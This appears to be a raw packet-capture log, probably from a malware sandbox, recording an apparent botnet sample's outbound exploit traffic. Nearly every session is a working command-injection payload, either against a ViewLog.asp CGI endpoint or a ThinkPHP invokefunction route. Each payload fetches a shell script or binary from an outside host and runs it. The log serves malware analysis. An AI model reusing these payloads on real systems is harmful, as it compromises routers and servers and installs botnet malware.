                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1220192.168.2.145646862.21.6.628080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.565190077 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1221192.168.2.145641094.123.99.938080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.579920053 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1222192.168.2.145262294.124.192.2458080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:45.595659971 CET169INHTTP/1.0 400 Bad request
                                                        cache-control: no-cache
                                                        content-type: text/html
                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0a
                                                        Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1223192.168.2.1441194112.29.207.14780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.037251949 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:46.411712885 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:35:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1224192.168.2.1454090112.28.236.24680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.051197052 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:46.396591902 CET165INHTTP/1.1 418 Unknown Status
                                                        Content-Length: 0
                                                        Connection: close
                                                        Date: Wed, 14 Feb 2024 08:35:46 GMT
                                                        Server: TencentEdgeOne
                                                        EO-LOG-UUID: 16090160570876408353
                                                        Feb 14, 2024 09:35:46.574501991 CET1INData Raw: 0d
                                                        Data Ascii:
                                                        Feb 14, 2024 09:35:46.750550032 CET1INData Raw: 0d
                                                        Data Ascii:


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1225192.168.2.1441190112.29.207.14780
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.064310074 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:46.423676014 CET315INHTTP/1.1 400 Bad Request
                                                        Server: openresty
                                                        Date: Wed, 14 Feb 2024 08:35:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 154
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>openresty</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1226192.168.2.144042088.122.18.11480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.242233038 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:46.443674088 CET179INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 475
                                                        Connection: close
                                                        ETag: "622f06cd-1db"
                                                        Feb 14, 2024 09:35:46.443708897 CET487INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><title>Freebox :: Requte invalide</title><link href="/e


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1227192.168.2.145302888.99.183.24480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.245650053 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:46.455427885 CET525INHTTP/1.1 400 Bad Request
                                                        Date: Wed, 14 Feb 2024 08:35:46 GMT
                                                        Server: Apache
                                                        Content-Length: 347
                                                        Connection: close
                                                        Content-Type: text/html; charset=iso-8859-1
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 62 72 20 2f 3e 0a 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>Bad Request</h1><p>Your browser sent a request that this server could not understand.<br /></p><p>Additionally, a 400 Bad Requesterror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1228192.168.2.143521688.249.225.17180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.298423052 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1229192.168.2.1438236112.161.225.15680
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.678555012 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1230192.168.2.1439428112.126.59.19580
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:46.776560068 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:47.131553888 CET323INHTTP/1.1 400 Bad Request
                                                        Server: nginx
                                                        Date: Wed, 14 Feb 2024 08:35:46 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 166
                                                        Connection: close
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1231192.168.2.145180631.136.26.1108080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.069811106 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:48.706393957 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:49.986282110 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:52.674305916 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:35:57.794173002 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                        Feb 14, 2024 09:36:08.033673048 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1232192.168.2.145012094.123.90.1668080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.102539062 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1233192.168.2.143471495.210.96.24380
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.322814941 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1234192.168.2.145355095.130.52.13880
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.337711096 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1235192.168.2.143427094.61.240.2088080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.337822914 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1236192.168.2.144432894.122.209.618080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.348783970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1237192.168.2.145909695.100.145.23180
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.349435091 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: /
                                                        User-Agent: Uirusu/2.0
                                                        Feb 14, 2024 09:35:48.569763899 CET479INHTTP/1.0 400 Bad Request
                                                        Server: AkamaiGHost
                                                        Mime-Version: 1.0
                                                        Content-Type: text/html
                                                        Content-Length: 257
                                                        Expires: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Date: Wed, 14 Feb 2024 08:35:48 GMT
                                                        Connection: close
                                                        Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 65 37 39 31 36 34 35 66 26 23 34 36 3b 31 37 30 37 38 39 39 37 34 38 26 23 34 36 3b 39 34 65 36 62 38 36 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                        Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;e791645f&#46;1707899748&#46;94e6b86</BODY></HTML>


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1238192.168.2.143635494.123.64.568080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.350642920 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1239192.168.2.144005894.123.77.858080
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.352190971 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                        Host: 192.168.0.14:80
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
                                                        Accept: */*
                                                        User-Agent: python-requests/2.20.0
                                                        Content-Length: 227
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                        Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        1240192.168.2.144387095.140.156.5480
                                                        TimestampBytes transferredDirectionData
                                                        Feb 14, 2024 09:35:48.362056971 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                        Connection: keep-alive
                                                        Accept-Encoding: gzip, deflate
